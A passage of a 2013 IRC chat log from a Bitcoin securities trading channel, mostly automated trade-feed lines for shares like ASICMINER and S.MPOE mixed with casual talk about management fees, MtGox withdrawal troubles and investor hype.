large auction happening? was wondering why the price was hovering" re: AM Jun 26 15:59:56 people just want it to go up every moment i guess Jun 26 16:01:12 people are funny Jun 26 16:01:49 you buy one of the best investments and complain when it's not doing more Jun 26 16:01:55 funny people Jun 26 16:03:23 and they want their investments served to them primed to make money with little or no research on their part Jun 26 16:03:49 [BTCTC] [S.MPOE-PT] 100 @ 0.0008 = 0.08 BTC [+] Jun 26 16:03:49 right Jun 26 16:03:50 [BTCTC] [S.MPOE-PT] 1 @ 0.0008 BTC [+] Jun 26 16:03:51 [BTCTC] [S.MPOE-PT] 100 @ 0.000809 = 0.0809 BTC [+] Jun 26 16:03:52 [BTCTC] [S.MPOE-PT] 715 @ 0.00081 = 0.5792 BTC [+] Jun 26 16:03:53 and then when it falls Jun 26 16:03:56 they want answers Jun 26 16:04:35 when it falls they bring out the pitchforks Jun 26 16:05:27 hard to accept responsibility when you can impale someone else Jun 26 16:07:15 was it someone in your thread that asked why they only received 95% of the dividend? Jun 26 16:07:56 [BTCTC] [S.DICE-PT] 3 @ 0.002447 = 0.0073 BTC [+] Jun 26 16:10:50 [HAVELOCK] [ASICM] 2 @ 0.034489 = 0.069 BTC [+] Jun 26 16:13:00 [BTCTC] [BASIC-MINING] 1 @ 1.8998 BTC [+] Jun 26 16:13:02 [BTCTC] [BASIC-MINING] 1 @ 1.899876 BTC [+] Jun 26 16:13:04 [BTCTC] [BASIC-MINING] 18 @ 1.899999 = 34.2 BTC [+] Jun 26 16:20:12 [BTCTC] [TAT.ASICMINER] 10 @ 0.03464 = 0.3464 BTC [-] Jun 26 16:20:43 i did have a few people question the 5% cut at times Jun 26 16:20:59 and many see it as TAT.AM being worth 5% less Jun 26 16:21:37 so stop taking 5% mr. greedy Jun 26 16:21:41 do it for free Jun 26 16:22:11 it's far from free to do it Jun 26 16:22:17 for example Jun 26 16:22:20 on Havelock Jun 26 16:22:25 I pay a monthly fee Jun 26 16:22:34 .05% of MARKET CAP Jun 26 16:22:39 :( Jun 26 16:22:54 which comes out to like half of the profits from that 5% Jun 26 16:23:20 so i might get like 5btc from my Havelock mgmt fee this month Jun 26 16:23:22 everyone wants to get paid Jun 26 16:23:46 [HAVELOCK] [ASICM] 1 @ 0.034489 BTC [+] Jun 26 16:23:48 [BTCTC] [ASICMINER-PT] 1 @ 3.4421 BTC [-] Jun 26 16:23:59 so $520 to manage $1m worth of assets Jun 26 16:24:12 i'm so greedy Jun 26 16:24:31 ThickAsThieves: but 'murica Jun 26 16:24:45 [BTCTC] [TAT.VIRTUALMINE] 394 @ 0.004311 = 1.6985 BTC [+] Jun 26 16:24:57 true Jun 26 16:25:02 ThickAsThieves that's funny Jun 26 16:25:18 murica is entitled to anything it dreams up Jun 26 16:25:22 murican dream Jun 26 16:25:25 [BTCTC] [COGNITIVE] 1 @ 0.375001 BTC [-] Jun 26 16:25:31 i want it, therefore i deserve it Jun 26 16:26:51 worse... the ovarian lottery makes me entitled to it Jun 26 16:28:47 [BTCTC] [ASICMINER-PT] 3 @ 3.487772 = 10.4633 BTC [+] Jun 26 16:28:49 [BTCTC] [ASICMINER-PT] 1 @ 3.487775 BTC [+] Jun 26 16:32:17 [HAVELOCK] [SDICE] 2 @ 0.2 = 0.4 BTC [+] Jun 26 16:37:20 ;;bcstats Jun 26 16:37:23 Current Blocks: 243434 | Current Difficulty: 1.933925827238668E7 | Next Difficulty At Block: 243935 | Next Difficulty In: 501 blocks | Next Difficulty In About: 2 days, 19 hours, 55 minutes, and 55 seconds | Next Difficulty Estimate: 21059085.435 | Estimated Percent Change: 8.89293 Jun 26 16:44:10 [BTCTC] [RSM] 80 @ 0.0235 = 1.88 BTC [+] Jun 26 16:51:31 [BTCTC] [COGNITIVE] 1 @ 0.375 BTC [-] Jun 26 16:52:24 [BTCTC] [TAT.ASICMINER] 1 @ 0.034501 BTC [-] Jun 26 16:52:26 [BTCTC] [TAT.ASICMINER] 1 @ 0.0345 BTC [-] Jun 26 16:52:28 [BTCTC] [TAT.ASICMINER] 10 @ 0.03441 = 0.3441 BTC [-] Jun 26 16:52:29 [BTCTC] [TAT.ASICMINER] 20 @ 0.034401 = 0.688 BTC [-] Jun 26 16:52:31 [BTCTC] [TAT.ASICMINER] 7 @ 0.0344 = 0.2408 BTC [-] Jun 26 16:54:14 [BTCTC] [ASICMINER-PT] 3 @ 3.442123 = 10.3264 BTC [-] Jun 26 16:55:07 oh Jun 26 16:55:09 trouble in goxland Jun 26 16:55:29 i'm a little late on the news, sorry Jun 26 16:55:47 ;;ticker Jun 26 16:55:47 MtGox BTCUSD ticker | Best bid: 103.73001, Best ask: 104.04999, Bid-ask spread: 0.31998, Last trade: 104.04999, 24 hour volume: 20339.98868345, 24 hour low: 101.50000, 24 hour high: 105.50000, 24 hour vwap: 103.72337 Jun 26 16:56:36 [BTCTC] [DMS.MINING] 35 @ 0.020927 = 0.7324 BTC [+] Jun 26 16:56:37 [BTCTC] [DMS.MINING] 1 @ 0.020927 BTC [+] Jun 26 16:57:05 I mean with the withdrawl stop Jun 26 16:57:13 a history of incompetence Jun 26 16:57:17 a miracle they are still in business Jun 26 16:57:22 i mgiht pull all my funds Jun 26 16:57:58 fucking up the deal with coinbase, losing bitpay, their policies during the crash etc Jun 26 17:00:39 [HAVELOCK] [ASICM] 4 @ 0.0342 = 0.1368 BTC [-] Jun 26 17:00:41 [HAVELOCK] [ASICM] 60 @ 0.0342 = 2.052 BTC [-] Jun 26 17:00:50 [HAVELOCK] [ASICM] 6 @ 0.0342 = 0.2052 BTC [-] Jun 26 17:06:00 [BTCTC] [DMS.MINING] 3 @ 0.020301 = 0.0609 BTC [-] Jun 26 17:08:50 [MPEX] [S.MPOE] 1946 @ 0.00081566 = 1.5873 BTC [-] Jun 26 17:09:02 [MPEX] [S.MPOE] 13004 @ 0.00081524 = 10.6014 BTC [-] Jun 26 17:09:41 [BTCTC] [DMS.MINING] 9 @ 0.020402 = 0.1836 BTC [+] Jun 26 17:11:06 [BTCTC] [DMS.MINING] 18 @ 0.020402 = 0.3672 BTC [+] Jun 26 17:15:15 [BTCTC] [TAT.ASICMINER] 1 @ 0.034629 BTC [+] Jun 26 17:18:41 [BTCTC] [BASIC-MINING] 7 @ 1.899999 = 13.3 BTC [+] Jun 26 17:19:36 [HAVELOCK] [ASICM] 9 @ 0.034 = 0.306 BTC [-] Jun 26 17:20:49 taub_: I pulled all my funds off gox a while ago Jun 26 17:21:22 I still have not decided on which is the best exchange Jun 26 17:21:45 [BTCTC] [S.DICE-PT] 100 @ 0.0021 = 0.21 BTC [-] Jun 26 17:21:48 [BTCTC] [S.DICE-PT] 180 @ 0.00205 = 0.369 BTC [-] Jun 26 17:21:59 [BTCTC] [S.DICE-PT] 4 @ 0.00205 = 0.0082 BTC [-] Jun 26 17:23:55 they all can't be trusted, really :( Jun 26 17:24:09 maybe I should cash out into gold coins Jun 26 17:24:26 naah Jun 26 17:25:04 [MPEX] [S.MPOE] 6646 @ 0.00081524 = 5.4181 BTC [-] Jun 26 17:25:07 [MPEX] [S.MPOE] 8300 @ 0.00081357 = 6.7526 BTC [-] Jun 26 17:25:09 [MPEX] [S.MPOE] 4154 @ 0.00081344 = 3.379 BTC [-] Jun 26 17:26:38 [BTCTC] [DMS.MINING] 29 @ 0.020907 = 0.6063 BTC [+] Jun 26 17:28:36 [BTCTC] [S.MPOE-PT] 100 @ 0.00089 = 0.089 BTC [+] Jun 26 17:28:37 [BTCTC] [S.MPOE-PT] 100 @ 0.0009 = 0.09 BTC [+] Jun 26 17:28:38 [BTCTC] [S.MPOE-PT] 100 @ 0.001 = 0.1 BTC [+] Jun 26 17:28:52 [BTCTC] [S.DICE-PT] 276 @ 0.00205 = 0.5658 BTC [-] Jun 26 17:35:36 [HAVELOCK] [HIM] 3 @ 0.269 = 0.807 BTC [-] Jun 26 17:36:41 wtf is going on with the S.MPOE-PT on btc? There is no sell orders and the price is jumping way above MPOE on MPEx? Jun 26 17:39:07 [HAVELOCK] [ASICM] 100 @ 0.03419 = 3.419 BTC [+] Jun 26 17:39:08 [HAVELOCK] [ASICM] 100 @ 0.03419 = 3.419 BTC [+] Jun 26 17:40:02 [BTCTC] [ASICMINER-PT] 1 @ 3.4422 BTC [+] Jun 26 17:40:03 [BTCTC] [ASICMINER-PT] 1 @ 3.442141 BTC [-] Jun 26 17:41:26 lol Jun 26 17:41:33 approaching dividends? Jun 26 17:41:55 yep Jun 26 17:42:06 its weird though, you can bid up the price of the pass through Jun 26 17:42:12 without affecting the underlying Jun 26 17:43:20 direct shares tend to use PT pricing Jun 26 17:43:30 usually with a lil premium too Jun 26 17:43:34 [MPEX] [S.MPOE] 2033 @ 0.00081642 = 1.6598 BTC [+] Jun 26 17:43:47 and now AM has give direct shares extra priveleges Jun 26 17:43:56 like being able to buy hardware on loan Jun 26 17:48:09 [HAVELOCK] [SDICE] 1 @ 0.185201 BTC [-] Jun 26 17:49:31 [HAVELOCK] [ASICM] 1 @ 0.034 BTC [-] Jun 26 17:51:10 [HAVELOCK] [HIM] 7 @ 0.269 = 1.883 BTC [-] Jun 26 17:52:10 http://www.businessinsider.com/bitcoin-bits-2013-6 <<< mjr Jun 26 17:52:18 Bitcoin Bits - Business Insider Jun 26 17:54:33 http://thenextweb.com/apps/2013/06/26/gaming-classic-contra-lands-on-mobile-with-official-konami-remake-for-ios/ Jun 26 17:54:37 Konami's Contra Lands on Mobile with Official Remake for iOS Jun 26 17:56:38 rich people meeting up in person to trade bitcoins is quaint Jun 26 17:57:08 a good habit to get into Jun 26 17:57:51 can't hurt to have healthy "analog" means of trade Jun 26 17:57:56 [HAVELOCK] [ASICM] 29 @ 0.034 = 0.986 BTC [-] Jun 26 17:58:19 [BTCTC] [TAT.ASICMINER] 1 @ 0.034411 BTC [-] Jun 26 17:58:20 i certainly know where to go irl to rob people Jun 26 17:58:20 [BTCTC] [TAT.ASICMINER] 3 @ 0.03441 = 0.1032 BTC [-] Jun 26 17:58:29 [BTCTC] [TAT.ASICMINER] 3 @ 0.0344 = 0.1032 BTC [-] Jun 26 17:58:32 [BTCTC] [TAT.ASICMINER] 5 @ 0.034299 = 0.1715 BTC [-] Jun 26 17:59:58 [BTCTC] [COGNITIVE] 2 @ 0.334012 = 0.668 BTC [-] Jun 26 18:00:29 [BTCTC] [COGNITIVE] 1 @ 0.334011 BTC [-] Jun 26 18:00:38 [BTCTC] [TAT.ASICMINER] 1 @ 0.0345 BTC [+] Jun 26 18:01:06 [BTCTC] [COGNITIVE] 2 @ 0.334 = 0.668 BTC [-] Jun 26 18:01:21 [BTCTC] [TAT.ASICMINER] 9 @ 0.034568 = 0.3111 BTC [+] Jun 26 18:01:31 [BTCTC] [COGNITIVE] 2 @ 0.33303 = 0.6661 BTC [-] Jun 26 18:01:38 [BTCTC] [BASIC-MINING] 1 @ 1.899999 BTC [+] Jun 26 18:03:06 [BTCTC] [DMS.MINING] 54 @ 0.020928 = 1.1301 BTC [+] Jun 26 18:03:15 [BTCTC] [TAT.ASICMINER] 8 @ 0.034568 = 0.2765 BTC [+] Jun 26 18:03:54 [BTCTC] [TAT.ASICMINER] 1 @ 0.034569 BTC [+] Jun 26 18:04:01 [BTCTC] [DMS.PURCHASE] 1 @ 0.053891 BTC [-] Jun 26 18:04:19 [HAVELOCK] [ASICM] 13 @ 0.034399 = 0.4472 BTC [+] Jun 26 18:04:31 [BTCTC] [DMS.MINING] 1 @ 0.021 BTC [+] Jun 26 18:04:35 [BTCTC] [TAT.ASICMINER] 24 @ 0.03457 = 0.8297 BTC [+] Jun 26 18:04:36 [BTCTC] [TAT.ASICMINER] 167 @ 0.03457 = 5.7732 BTC [+] Jun 26 18:05:20 [BTCTC] [BASIC-MINING] 1 @ 1.9 BTC [+] Jun 26 18:05:22 [BTCTC] [BASIC-MINING] 1 @ 1.9 BTC [+] Jun 26 18:05:56 [BTCTC] [DMS.MINING] 1 @ 0.020905 BTC [-] Jun 26 18:07:09 [BTCTC] [S.MPOE-PT] 27 @ 0.00115 = 0.0311 BTC [+] Jun 26 18:07:15 [BTCTC] [TAT.ASICMINER] 20 @ 0.034568 = 0.6914 BTC [-] Jun 26 18:08:00 [HAVELOCK] [ASICM] 5 @ 0.0344 = 0.172 BTC [+] Jun 26 18:10:22 [HAVELOCK] [ASICM] 20 @ 0.0344 = 0.688 BTC [+] Jun 26 18:10:36 [HAVELOCK] [ASICM] 15 @ 0.0344 = 0.516 BTC [+] Jun 26 18:10:37 [BTCTC] [TAT.ASICMINER] 3 @ 0.034569 = 0.1037 BTC [+] Jun 26 18:10:47 [HAVELOCK] [ASICM] 34 @ 0.034487 = 1.1726 BTC [+] Jun 26 18:10:48 [HAVELOCK] [ASICM] 50 @ 0.034488 = 1.7244 BTC [+] Jun 26 18:11:31 [HAVELOCK] [ASICM] 151 @ 0.034488 = 5.2077 BTC [+] Jun 26 18:12:22 [HAVELOCK] [ASICM] 460 @ 0.0344 = 15.824 BTC [-] Jun 26 18:13:09 [HAVELOCK] [ASICM] 3 @ 0.03448999 = 0.1035 BTC [+] Jun 26 18:13:16 [HAVELOCK] [ASICM] 1 @ 0.03445 BTC [-] Jun 26 18:15:56 [BTCTC] [DMS.SELLING] 15 @ 0.03485 = 0.5228 BTC [+] Jun 26 18:15:58 [BTCTC] [DMS.SELLING] 1 @ 0.035989 BTC [+] Jun 26 18:16:40 [BTCTC] [TAT.ASICMINER] 1 @ 0.034568 BTC [-] Jun 26 18:16:42 [BTCTC] [TAT.ASICMINER] 5 @ 0.034569 = 0.1728 BTC [+] Jun 26 18:17:15 [BTCTC] [DMS.MINING] 16 @ 0.0205 = 0.328 BTC [-] Jun 26 18:18:10 [BTCTC] [DMS.PURCHASE] 80 @ 0.053891 = 4.3113 BTC [-] Jun 26 18:22:06 [BTCTC] [PAJKA.BOND] 1 @ 0.069 BTC [-] Jun 26 18:22:48 [BTCTC] [DMS.MINING] 1 @ 0.020995 BTC [+] Jun 26 18:22:50 [BTCTC] [DMS.MINING] 1 @ 0.021 BTC [+] Jun 26 18:22:54 [BTCTC] [DMS.MINING] 39 @ 0.020602 = 0.8035 BTC [-] Jun 26 18:22:55 [BTCTC] [DMS.MINING] 41 @ 0.020601 = 0.8446 BTC [-] Jun 26 18:23:32 [BTCTC] [DMS.SELLING] 5 @ 0.034 = 0.17 BTC [-] Jun 26 18:24:08 [BTCTC] [DMS.PURCHASE] 30 @ 0.053891 = 1.6167 BTC [-] Jun 26 18:24:16 [BTCTC] [RSM] 18 @ 0.0235 = 0.423 BTC [+] Jun 26 18:24:48 [HAVELOCK] [SDICE] 1 @ 0.199999 BTC [+] Jun 26 18:25:08 [HAVELOCK] [SDICE] 20 @ 0.2 = 4 BTC [+] Jun 26 18:25:53 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.004801 BTC [+] Jun 26 18:26:09 [BTCTC] [TAT.ASICMINER] 25 @ 0.03456 = 0.864 BTC [-] Jun 26 18:26:37 [BTCTC] [ASICMINER-PT] 2 @ 3.479 = 6.958 BTC [+] Jun 26 18:26:39 [BTCTC] [ASICMINER-PT] 2 @ 3.48 = 6.96 BTC [+] Jun 26 18:29:02 [BTCTC] [TAT.ASICMINER] 13 @ 0.034568 = 0.4494 BTC [+] Jun 26 18:29:31 [BTCTC] [ASICMINER-PT] 1 @ 3.475 BTC [-] Jun 26 18:29:43 [BTCTC] [DMS.PURCHASE] 16 @ 0.053891 = 0.8623 BTC [-] Jun 26 18:30:29 [MPEX] [S.MPOE] 18329 @ 0.00081344 = 14.9095 BTC [-] Jun 26 18:30:33 [MPEX] [S.MPOE] 16227 @ 0.00081271 = 13.1878 BTC [-] Jun 26 18:30:48 [MPEX] [S.MPOE] 16294 @ 0.00081232 = 13.2359 BTC [-] Jun 26 18:33:41 [BTCTC] [ASICMINER-PT] 7 @ 3.465 = 24.255 BTC [-] Jun 26 18:33:52 [BTCTC] [ASICMINER-PT] 8 @ 3.465 = 27.72 BTC [-] Jun 26 18:36:04 [HAVELOCK] [HIM] 4 @ 0.268 = 1.072 BTC [-] Jun 26 18:36:04 [HAVELOCK] [HIM] 14 @ 0.269 = 3.766 BTC [+] Jun 26 18:37:20 [BTCTC] [S.MPOE-PT] 20 @ 0.00115 = 0.023 BTC [+] Jun 26 18:38:50 [BTCTC] [RSM] 1 @ 0.023 BTC [-] Jun 26 18:40:18 [BTCTC] [ASICMINER-PT] 1 @ 3.4635 BTC [-] Jun 26 18:40:20 [BTCTC] [ASICMINER-PT] 1 @ 3.46 BTC [-] Jun 26 18:42:12 [BTCTC] [ASICMINER-PT] 1 @ 3.459 BTC [-] Jun 26 18:42:57 [BTCTC] [ASICMINER-PT] 2 @ 3.45 = 6.9 BTC [-] Jun 26 18:42:59 [BTCTC] [ASICMINER-PT] 1 @ 3.45 BTC [-] Jun 26 18:43:01 [BTCTC] [ASICMINER-PT] 1 @ 3.445 BTC [-] Jun 26 18:43:03 [BTCTC] [ASICMINER-PT] 2 @ 3.442141 = 6.8843 BTC [-] Jun 26 18:43:05 [BTCTC] [ASICMINER-PT] 8 @ 3.44214 = 27.5371 BTC [-] Jun 26 18:43:08 [BTCTC] [ASICMINER-PT] 3 @ 3.442 = 10.326 BTC [-] Jun 26 18:43:26 [BTCTC] [TAT.ASICMINER] 1 @ 0.034561 BTC [-] Jun 26 18:47:13 [BTCTC] [S.DICE-PT] 13 @ 0.002048 = 0.0266 BTC [-] Jun 26 18:51:36 [BTCTC] [DMS.MINING] 39 @ 0.020971 = 0.8179 BTC [+] Jun 26 18:51:57 [HAVELOCK] [ASICM] 3 @ 0.034 = 0.102 BTC [-] Jun 26 18:52:23 [BTCTC] [TAT.VIRTUALMINE] 250 @ 0.004802 = 1.2005 BTC [+] Jun 26 18:52:36 [BTCTC] [TAT.ASICMINER] 1 @ 0.034559 BTC [-] Jun 26 18:53:05 [BTCTC] [TAT.ASICMINER] 25 @ 0.03456 = 0.864 BTC [+] Jun 26 18:53:41 [BTCTC] [ASICMINER-PT] 1 @ 3.44 BTC [-] Jun 26 18:53:51 [HAVELOCK] [ASICM] 1 @ 0.034 BTC [-] Jun 26 18:54:35 https://bitcointalk.org/index.php?topic=158806.1060 Jun 26 18:54:38 [AMC]-The Official Active Mining Cooperative Discussion Jun 26 18:54:39 what is this hype Jun 26 18:55:01 !ticker m s.mpoe Jun 26 18:55:02 [MPEX:S.MPOE] 1D: 0.00078535 / 0.00081456 / 0.00082042 (391167 shares, 318.63 BTC), 7D: 0.00067495 / 0.0007726 / 0.00082042 (52407579 shares, 40,490.57 BTC), 30D: 0.0006575 / 0.00076504 / 0.00082042 (59967252 shares, 45,877.83 BTC) Jun 26 18:58:02 jcpham, likely hype itself is the news Jun 26 18:58:16 greed abounds in AMC shareholders Jun 26 18:58:29 each dreaming they bought the next ASICMINER Jun 26 18:58:45 [MPEX] [S.MPOE] 11256 @ 0.00081232 = 9.1435 BTC [-] Jun 26 18:58:47 [MPEX] [S.MPOE] 1800 @ 0.00081214 = 1.4619 BTC [-] Jun 26 19:00:23 look at this post https://bitcointalk.org/index.php?topic=158806.msg2585097#msg2585097 Jun 26 19:00:32 detached from reality Jun 26 19:00:40 [BTCTC] [TAT.ASICMINER] 13 @ 0.03457 = 0.4494 BTC [+] Jun 26 19:01:24 [BTCTC] [ASICMINER-PT] 1 @ 3.44 BTC [-] Jun 26 19:01:29 [BTCTC] [ASICMINER-PT] 14 @ 3.44 = 48.16 BTC [-] Jun 26 19:01:31 better set up some put options Jun 26 19:01:32 hehe Jun 26 19:01:33 [BTCTC] [TAT.ASICMINER] 28 @ 0.03457 = 0.968 BTC [+] Jun 26 19:01:37 [BTCTC] [ASICMINER-PT] 15 @ 3.44 = 51.6 BTC [-] Jun 26 19:02:03 I'm actually tempted, except that anyone who writes something like that probably can't afford more than a couple Jun 26 19:03:25 [BTCTC] [S.DICE-PT] 13 @ 0.002441 = 0.0317 BTC [+] Jun 26 19:03:35 [BTCTC] [BTC-GOLD] 3 @ 0.019779 = 0.0593 BTC [-] Jun 26 19:04:01 [BTCTC] [DMS.PURCHASE] 1 @ 0.05419 BTC [+] Jun 26 19:04:29 [BTCTC] [GSDPT] 46 @ 0.00245 = 0.1127 BTC [-] Jun 26 19:05:12 [BTCTC] [S.BBET-PT] 73 @ 0.001766 = 0.1289 BTC [+] Jun 26 19:06:49 [BTCTC] [DMS.PURCHASE] 1 @ 0.05419 BTC [+] Jun 26 19:09:21 the writing IS on the wall after all Jun 26 19:10:35 ya, it says: you're fucked Jun 26 19:10:37 :) Jun 26 19:11:49 [BTCTC] [ASICMINER-PT] 4 @ 3.44 = 13.76 BTC [-] Jun 26 19:15:22 [HAVELOCK] [ASICM] 4 @ 0.034 = 0.136 BTC [-] Jun 26 19:15:28 [BTCTC] [S.MPOE-PT] 1 @ 0.00081 BTC [-] Jun 26 19:15:37 [BTCTC] [S.MPOE-PT] 2 @ 0.0008 = 0.0016 BTC [-] Jun 26 19:15:43 [BTCTC] [TAT.ASICMINER] 1 @ 0.034561 BTC [-] Jun 26 19:15:52 [BTCTC] [TAT.ASICMINER] 9 @ 0.03456 = 0.311 BTC [-] Jun 26 19:16:59 [BTCTC] [ASICMINER-PT] 12 @ 3.44 = 41.28 BTC [-] Jun 26 19:17:02 [BTCTC] [ASICMINER-PT] 1 @ 3.42 BTC [-] Jun 26 19:17:06 [BTCTC] [ASICMINER-PT] 1 @ 3.4005 BTC [-] Jun 26 19:17:10 [BTCTC] [ASICMINER-PT] 21 @ 3.4 = 71.4 BTC [-] Jun 26 19:17:50 [MPEX] [S.MPOE] 1900 @ 0.00081214 = 1.5431 BTC [-] Jun 26 19:17:50 [MPEX] [S.MPOE] 12400 @ 0.00081172 = 10.0653 BTC [-] Jun 26 19:19:37 [BTCTC] [ASICMINER-PT] 3 @ 3.3868 = 10.1604 BTC [-] Jun 26 19:20:42 [BTCTC] [ASICMINER-PT] 1 @ 3.3868 BTC [-] Jun 26 19:21:01 [BTCTC] [ASICMINER-PT] 3 @ 3.38 = 10.14 BTC [-] Jun 26 19:21:19 [BTCTC] [ASICMINER-PT] 2 @ 3.371 = 6.742 BTC [-] Jun 26 19:21:33 [BTCTC] [TAT.ASICMINER] 1 @ 0.034299 BTC [-] Jun 26 19:21:35 [BTCTC] [TAT.ASICMINER] 10 @ 0.0342 = 0.342 BTC [-] Jun 26 19:21:37 [BTCTC] [TAT.ASICMINER] 40 @ 0.0341 = 1.364 BTC [-] Jun 26 19:21:39 [BTCTC] [TAT.ASICMINER] 35 @ 0.034 = 1.19 BTC [-] Jun 26 19:21:45 [BTCTC] [ASICMINER-PT] 2 @ 3.3705 = 6.741 BTC [-] Jun 26 19:22:00 [BTCTC] [ASICMINER-PT] 4 @ 3.370301 = 13.4812 BTC [-] Jun 26 19:22:17 [BTCTC] [ASICMINER-PT] 10 @ 3.3703 = 33.703 BTC [-] Jun 26 19:22:34 [BTCTC] [ASICMINER-PT] 3 @ 3.370001 = 10.11 BTC [-] Jun 26 19:22:57 [BTCTC] [ASICMINER-PT] 25 @ 3.370001 = 84.25 BTC [-] Jun 26 19:23:39 [BTCTC] [S.MPOE-PT] 1 @ 0.00081 BTC [+] Jun 26 19:23:53 [BTCTC] [ASICMINER-PT] 1 @ 3.370001 BTC [-] Jun 26 19:24:03 [HAVELOCK] [ASICM] 2 @ 0.034 = 0.068 BTC [-] Jun 26 19:24:42 [BTCTC] [TAT.ASICMINER] 50 @ 0.033903 = 1.6952 BTC [-] Jun 26 19:28:20 [BTCTC] [TAT.ASICMINER] 5 @ 0.034562 = 0.1728 BTC [+] Jun 26 19:28:54 [HAVELOCK] [SDICE] 55 @ 0.2 = 11 BTC [+] Jun 26 19:30:46 [BTCTC] [TAT.ASICMINER] 32 @ 0.033903 = 1.0849 BTC [-] Jun 26 19:31:22 [BTCTC] [TAT.ASICMINER] 18 @ 0.033903 = 0.6103 BTC [-] Jun 26 19:31:36 [BTCTC] [TAT.ASICMINER] 1 @ 0.033902 BTC [-] Jun 26 19:31:44 [BTCTC] [TAT.ASICMINER] 1 @ 0.0338 BTC [-] Jun 26 19:31:50 [BTCTC] [TAT.ASICMINER] 1 @ 0.0335 BTC [-] Jun 26 19:32:54 [BTCTC] [BASIC-MINING] 1 @ 1.770015 BTC [-] Jun 26 19:34:02 [BTCTC] [COGNITIVE] 4 @ 0.33303 = 1.3321 BTC [-] Jun 26 19:34:06 [BTCTC] [COGNITIVE] 1 @ 0.3303 BTC [-] Jun 26 19:35:16 [BTCTC] [TAT.ASICMINER] 195 @ 0.034096 = 6.6487 BTC [+] Jun 26 19:35:52 [BTCTC] [TAT.ASICMINER] 20 @ 0.03346 = 0.6692 BTC [-] Jun 26 19:36:57 [BTCTC] [TAT.ASICMINER] 50 @ 0.034557 = 1.7279 BTC [+] Jun 26 19:37:03 [MPEX] [S.MPOE] 3700 @ 0.00081008 = 2.9973 BTC [-] Jun 26 19:37:06 [BTCTC] [DMS.PURCHASE] 200 @ 0.053794 = 10.7588 BTC [-] Jun 26 19:37:16 [BTCTC] [TAT.ASICMINER] 1 @ 0.034558 BTC [+] Jun 26 19:37:18 [BTCTC] [TAT.ASICMINER] 3 @ 0.03457 = 0.1037 BTC [+] Jun 26 19:37:51 [BTCTC] [TAT.ASICMINER] 89 @ 0.03457 = 3.0767 BTC [+] Jun 26 19:37:52 [BTCTC] [TAT.ASICMINER] 300 @ 0.03457 = 10.371 BTC [+] Jun 26 19:38:37 [HAVELOCK] [VTX] 3 @ 0.489999 = 1.47 BTC [+] Jun 26 19:38:44 [HAVELOCK] [HIM] 4 @ 0.265001 = 1.06 BTC [-] Jun 26 19:38:46 [HAVELOCK] [HIM] 30 @ 0.265 = 7.95 BTC [-] Jun 26 19:38:50 [BTCTC] [TAT.ASICMINER] 4 @ 0.0341 = 0.1364 BTC [-] Jun 26 19:40:34 [HAVELOCK] [ASICM] 140 @ 0.034 = 4.76 BTC [-] Jun 26 19:40:50 [BTCTC] [DMS.MINING] 6 @ 0.021 = 0.126 BTC [+] Jun 26 19:42:02 [BTCTC] [TAT.VIRTUALMINE] 2 @ 0.004802 = 0.0096 BTC [+] Jun 26 19:42:03 [BTCTC] [S.MPOE-PT] 1 @ 0.00081 BTC [+] Jun 26 19:42:31 [BTCTC] [DMS.MINING] 11 @ 0.021 = 0.231 BTC [+] Jun 26 19:43:55 [BTCTC] [TAT.ASICMINER] 5 @ 0.03463 = 0.1732 BTC [+] Jun 26 19:44:40 [BTCTC] [TAT.ASICMINER] 1 @ 0.034111 BTC [-] Jun 26 19:46:45 [HAVELOCK] [VTX] 6 @ 0.489999 = 2.94 BTC [+] Jun 26 19:47:17 [BTCTC] [TAT.ASICMINER] 1 @ 0.034627 BTC [+] Jun 26 19:48:41 [BTCTC] [BASIC-MINING] 1 @ 1.780003 BTC [+] Jun 26 19:48:42 [BTCTC] [BASIC-MINING] 1 @ 1.780002 BTC [-] Jun 26 19:49:22 [BTCTC] [MININGCO.ETF] 3 @ 0.88 = 2.64 BTC [+] Jun 26 19:49:51 [HAVELOCK] [ASICM] 1 @ 0.034439 BTC [+] Jun 26 19:49:52 [HAVELOCK] [ASICM] 321 @ 0.03445 = 11.0585 BTC [+] Jun 26 19:50:04 [BTCTC] [S.MPOE-PT] 1 @ 0.0008 BTC [-] Jun 26 19:50:57 [BTCTC] [TAT.ASICMINER] 2 @ 0.03463 = 0.0693 BTC [+] Jun 26 19:51:12 [BTCTC] [ASICMINER-PT] 2 @ 3.449989 = 6.9 BTC [+] Jun 26 19:51:15 [BTCTC] [ASICMINER-PT] 1 @ 3.449989 BTC [+] Jun 26 19:51:21 [BTCTC] [DMS.MINING] 10 @ 0.02106 = 0.2106 BTC [+] Jun 26 19:51:25 [MPEX] [S.MPOE] 11450 @ 0.000811 = 9.286 BTC [+] Jun 26 19:51:30 [BTCTC] [ASICMINER-PT] 1 @ 3.449989 BTC [+] Jun 26 19:51:37 [MPEX] [S.MPOE] 3035 @ 0.00081328 = 2.4683 BTC [+] Jun 26 19:51:42 [BTCTC] [TAT.ASICMINER] 1 @ 0.034114 BTC [-] Jun 26 19:52:09 [BTCTC] [TAT.ASICMINER] 5 @ 0.034114 = 0.1706 BTC [-] Jun 26 19:52:32 [BTCTC] [ASICMINER-PT] 1 @ 3.449997 BTC [+] Jun 26 19:52:42 [BTCTC] [DMS.PURCHASE] 20 @ 0.053794 = 1.0759 BTC [-] Jun 26 19:53:25 [HAVELOCK] [ASICM] 30 @ 0.03445 = 1.0335 BTC [+] Jun 26 19:55:29 [BTCTC] [ASICMINER-PT] 4 @ 3.449999 = 13.8 BTC [+] Jun 26 19:55:32 [BTCTC] [ASICMINER-PT] 3 @ 3.45 = 10.35 BTC [+] Jun 26 19:56:02 [BTCTC] [ASICMINER-PT] 1 @ 3.45 BTC [+] Jun 26 19:57:19 [BTCTC] [ASICMINER-PT] 1 @ 3.45 BTC [+] Jun 26 19:59:29 [HAVELOCK] [ASICM] 8 @ 0.03445 = 0.2756 BTC [+] Jun 26 19:59:43 [BTCTC] [S.DICE-PT] 60 @ 0.002442 = 0.1465 BTC [+] Jun 26 20:00:57 [MPEX] [S.MPOE] 8465 @ 0.00081328 = 6.8844 BTC [+] Jun 26 20:02:29 [HAVELOCK] [HIM] 4 @ 0.268999 = 1.076 BTC [+] Jun 26 20:02:51 [HAVELOCK] [HIM] 34 @ 0.269 = 9.146 BTC [+] Jun 26 20:04:38 [BTCTC] [TAT.VIRTUALMINE] 2 @ 0.004919 = 0.0098 BTC [+] Jun 26 20:05:20 [BTCTC] [TAT.VIRTUALMINE] 2 @ 0.004918 = 0.0098 BTC [-] Jun 26 20:06:11 [HAVELOCK] [VTX] 6 @ 0.489999 = 2.94 BTC [+] Jun 26 20:06:39 [BTCTC] 